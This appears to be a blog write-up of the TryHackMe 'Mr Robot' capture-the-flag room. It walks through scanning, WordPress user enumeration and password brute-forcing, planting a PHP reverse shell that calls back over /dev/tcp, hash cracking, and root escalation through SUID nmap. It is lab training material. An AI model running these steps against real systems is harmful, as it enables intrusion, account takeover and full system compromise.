TryHackMe: Mr Robot CTF

nmap -Pn <ip>

2. All scan

nmap -A -p 22,80,443 <ip>

3. Vulnerability scan

nmap --script vuln -p 22,80,443 <ip>

This is a wordpress site. There’s a robots.txt file

4. Access HTTP site

There’re commands that I can try.

prepare
fsociety
inform
question
wakeup
join

Seems like these commands are just for fun.

Viewing source of index page is not useful.

Inspecting element is not useful neither.

5. Access robots.txt

Download fsocity.dic

wget http://<ip>/fsocity.diccat fsocity.dic

This file may contain useful password.

Count lines of the file

wc -l fsocity.dic

Sort the file and remove duplication

sort fsocity.dic | uniq > sort_fsocity.dicwc -l sort_fsocity.dic

Access http://<ip>/key-1-of-3.txt

6. Nikto scan

nikto -h http://<ip>/ -nossl

7.Directory scan

dirb http://<ip>

Seems like it’s a wordpress site. Access one of scanned directories.

http://<ip>/0/

View source, nothing useful.

8. Wordpress scan

wpscan --url http://<ip>/0/ -et -ep -eu

Failed

Add another flag as suggestion

wpscan --url http://<ip>/0/ --wp-content-dir -et -ep -eu

There’re 2 users: mich05654 and elliot.

9. Bruteforcing wordpress

wpscan --url http://<ip>/0/ --wp-content-dir -eu -P fsocity.dic

Access http://<ip>/wp-login.php

Username -> mich05654:Dylan_2791

Can’t do anything with this user.

Let’s try elliot:ER28–0652

On Dashboard -> Users. Elliot is an administrator.

Let’s get the reverse shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>

Go to appearance -> editor -> Put the code in 404.php

Create listener

nc -lvp 1234

Access 404.php

Now I have a shell.

cd /home/lscat key-2-of-3.txt

I don’t have permission to key2.

Read another file. It’s robot’s credential.

cat password.raw-md5

Crack with hashcat

hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txthashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt --show

Change to robot

su robot

Failed. I need TTY shell

Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Change to robot

su robot

Read key2

cat key-2-of-3.txt
1

Let’s do privilege escalation

Check if robot can run sudo.

sudo -l

I can’t run sudo.

Looking for SUID

find / -perm -u=s -type f 2>/dev/null

It’ nmap!!!

nmap --interactive!shid

Now I’m root.

cd /rootcat key-3-of-3.txt

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Postmortem — incident examination process

Why I Don’t Like MSDN

The best way to predict the future is to engineer it.

IonQ how to Implement and Run code for Quantum Hardware

Developer Wellness

Apache Spark and Hadoop on a Macbook Air running OSX Sierra

Read computer science — now chasing a writing career

Take a look git side by zsh

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ratiros01

ratiros01

OSCP

More from Medium

TryHackMe Holo — Recon

How to crack ssh password by hydra:

Bye Week Blues — Jets Recap Through Week 14

HOW TO CONFIGURE BINANCE SMART CHAIN ON YOUR WALLET?